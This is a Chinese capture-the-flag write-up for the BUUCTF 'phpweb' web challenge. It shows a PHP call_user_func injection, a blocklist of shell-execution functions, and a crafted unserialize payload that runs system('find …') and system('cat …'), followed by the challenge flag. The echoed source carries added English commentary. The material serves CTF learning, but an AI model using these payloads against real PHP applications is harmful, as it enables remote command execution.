BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb

书呆鱼 2022-04-27 阅读 71
web安全

BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb


  • 进入环境,发现调用了date()函数,抓包后发现POST传参存在名为func,值为date的变量

  • 尝试修改func变量

    func=echo&p=Y-m-d+h%3Ai%3As+a
    

    回显

    Warning :  call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function name in <b>/var/www/html/index.php on line 24
    
  • 发现这是一个 PHP 代码执行漏洞：传入的 func 会被 call_user_func() 直接调用。尝试 shell_exec、system 等函数名均被过滤，于是改为读取 index.php 的源码

    func=file_get_contents&p=index.php
    

    回显

    <?php
    // Blocklist of function names rejected by the request handler further down
    // (looked up with in_array after strtolower). A blocklist only stops the names
    // it lists: any other callable still reaches call_user_func — this writeup
    // later shows that with unserialize, which is absent here. The mitigation is an
    // allowlist of the functions the page actually needs (only date). Note that
    // array_walk appears twice, a sign the list was assembled by hand.
    $disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");
    /**
     * Invokes $func with the single argument $p via call_user_func and returns the
     * result only when it is a string; any other return type yields "".
     *
     * Both arguments arrive from $_REQUEST (request handler below) or from a Test
     * object's properties, so this is an arbitrary-function-call sink. The callee
     * has already run, with whatever side effects it has, before the return type
     * is inspected: the gettype check limits only what is echoed, not what is
     * executed.
     *
     * @param string $func name of the function to call (user-controlled)
     * @param mixed  $p    single argument forwarded to $func (user-controlled)
     * @return string the callee's result if it was a string, otherwise ""
     */
    function gettime($func, $p)
    {
        $result = call_user_func($func, $p);
        $a = gettype($result);
        if ($a == "string") {
            return $result;
        } else {
            return "";
        }
    }
    
    /**
     * Holder for the page's default behaviour: call date("Y-m-d h:i:s a") when
     * the object is destroyed.
     *
     * __destruct runs for every Test instance, including one rebuilt by
     * unserialize() from request data, so the class doubles as a deserialization
     * gadget: the object's $func and $p reach gettime() directly, bypassing the
     * $disable_fun check that only the request handler performs. Mitigation: never
     * unserialize untrusted input (prefer json_decode) and allowlist callables.
     */
    class Test
    {
        var $p = "Y-m-d h:i:s a";   // argument handed to $func
        var $func = "date";         // function name invoked from __destruct

        function __destruct()
        {
            // Loose != comparison: only "" (and values loosely equal to it)
            // skips the call; any other value is passed to gettime().
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    
    // Request handler. $_REQUEST merges GET, POST and COOKIE, so any of them may
    // supply func and p; neither key is checked for presence (a missing key
    // raises an undefined-index notice and yields null).
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    // Loose != null: "" is treated as absent, "0" is not.
    if ($func != null) {
        // Lower-cased before the lookup, so the blocklist is effectively
        // case-insensitive; the lookup itself is a non-strict in_array.
        $func = strtolower($func);
        if (!in_array($func, $disable_fun)) {
            // Blocklist passed: $func is called with the unvalidated $p.
            echo gettime($func, $p);
        } else {
            die("Hacker...");
        }
    }
    ?>
    
  • 发现 Test 类定义了 __destruct()，而 unserialize 又不在黑名单中，怀疑可以通过反序列化触发该析构函数

    <?php
    // Local copy of the target's Test class with the two properties preset to the
    // values this writeup submits; the server-side unserialize() rebuilds the
    // object from the class name and property names alone.
    class Test
    {
        var $p = "find / -name flag*";
        var $func = "system";
    }
    
    // Print the serialized form shown below; it is URL-encoded before being sent as p.
    $res = new Test();
    echo serialize($res);
    
    
    O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
    
  • 构造payload

    func=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a18%3a%22find%20%2f%20-name%20flag*%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
    

    回显

       /proc/sys/kernel/sched_domain/cpu0/domain0/flags
    /proc/sys/kernel/sched_domain/cpu1/domain0/flags
    /proc/sys/kernel/sched_domain/cpu10/domain0/flags
    /proc/sys/kernel/sched_domain/cpu11/domain0/flags
    /proc/sys/kernel/sched_domain/cpu12/domain0/flags
    /proc/sys/kernel/sched_domain/cpu13/domain0/flags
    /proc/sys/kernel/sched_domain/cpu14/domain0/flags
    /proc/sys/kernel/sched_domain/cpu15/domain0/flags
    /proc/sys/kernel/sched_domain/cpu16/domain0/flags
    /proc/sys/kernel/sched_domain/cpu17/domain0/flags
    /proc/sys/kernel/sched_domain/cpu18/domain0/flags
    /proc/sys/kernel/sched_domain/cpu19/domain0/flags
    /proc/sys/kernel/sched_domain/cpu2/domain0/flags
    /proc/sys/kernel/sched_domain/cpu20/domain0/flags
    /proc/sys/kernel/sched_domain/cpu21/domain0/flags
    /proc/sys/kernel/sched_domain/cpu22/domain0/flags
    /proc/sys/kernel/sched_domain/cpu23/domain0/flags
    /proc/sys/kernel/sched_domain/cpu24/domain0/flags
    /proc/sys/kernel/sched_domain/cpu25/domain0/flags
    /proc/sys/kernel/sched_domain/cpu26/domain0/flags
    /proc/sys/kernel/sched_domain/cpu27/domain0/flags
    /proc/sys/kernel/sched_domain/cpu28/domain0/flags
    /proc/sys/kernel/sched_domain/cpu29/domain0/flags
    /proc/sys/kernel/sched_domain/cpu3/domain0/flags
    /proc/sys/kernel/sched_domain/cpu30/domain0/flags
    /proc/sys/kernel/sched_domain/cpu31/domain0/flags
    /proc/sys/kernel/sched_domain/cpu4/domain0/flags
    /proc/sys/kernel/sched_domain/cpu5/domain0/flags
    /proc/sys/kernel/sched_domain/cpu6/domain0/flags
    /proc/sys/kernel/sched_domain/cpu7/domain0/flags
    /proc/sys/kernel/sched_domain/cpu8/domain0/flags
    /proc/sys/kernel/sched_domain/cpu9/domain0/flags
    /sys/devices/pnp0/00:00/tty/ttyS0/flags
    /sys/devices/platform/serial8250/tty/ttyS15/flags
    /sys/devices/platform/serial8250/tty/ttyS6/flags
    /sys/devices/platform/serial8250/tty/ttyS23/flags
    /sys/devices/platform/serial8250/tty/ttyS13/flags
    /sys/devices/platform/serial8250/tty/ttyS31/flags
    /sys/devices/platform/serial8250/tty/ttyS4/flags
    /sys/devices/platform/serial8250/tty/ttyS21/flags
    /sys/devices/platform/serial8250/tty/ttyS11/flags
    /sys/devices/platform/serial8250/tty/ttyS2/flags
    /sys/devices/platform/serial8250/tty/ttyS28/flags
    /sys/devices/platform/serial8250/tty/ttyS18/flags
    /sys/devices/platform/serial8250/tty/ttyS9/flags
    /sys/devices/platform/serial8250/tty/ttyS26/flags
    /sys/devices/platform/serial8250/tty/ttyS16/flags
    /sys/devices/platform/serial8250/tty/ttyS7/flags
    /sys/devices/platform/serial8250/tty/ttyS24/flags
    /sys/devices/platform/serial8250/tty/ttyS14/flags
    /sys/devices/platform/serial8250/tty/ttyS5/flags
    /sys/devices/platform/serial8250/tty/ttyS22/flags
    /sys/devices/platform/serial8250/tty/ttyS12/flags
    /sys/devices/platform/serial8250/tty/ttyS30/flags
    /sys/devices/platform/serial8250/tty/ttyS3/flags
    /sys/devices/platform/serial8250/tty/ttyS20/flags
    /sys/devices/platform/serial8250/tty/ttyS10/flags
    /sys/devices/platform/serial8250/tty/ttyS29/flags
    /sys/devices/platform/serial8250/tty/ttyS1/flags
    /sys/devices/platform/serial8250/tty/ttyS19/flags
    /sys/devices/platform/serial8250/tty/ttyS27/flags
    /sys/devices/platform/serial8250/tty/ttyS17/flags
    /sys/devices/platform/serial8250/tty/ttyS8/flags
    /sys/devices/platform/serial8250/tty/ttyS25/flags
    /sys/devices/virtual/net/lo/flags
    /sys/devices/virtual/net/eth0/flags
    /sys/devices/virtual/net/tunl0/flags
    /tmp/flagoefiu4r93
    /tmp/flagoefiu4r93
    
  • 最后在/tmp/flagoefiu4r93中找到flag

    func=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a22%3a%22cat%20%2ftmp%2fflagoefiu4r93%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
    
    flag{0ae2a444-4095-4452-9301-78e18c2a60b6}
    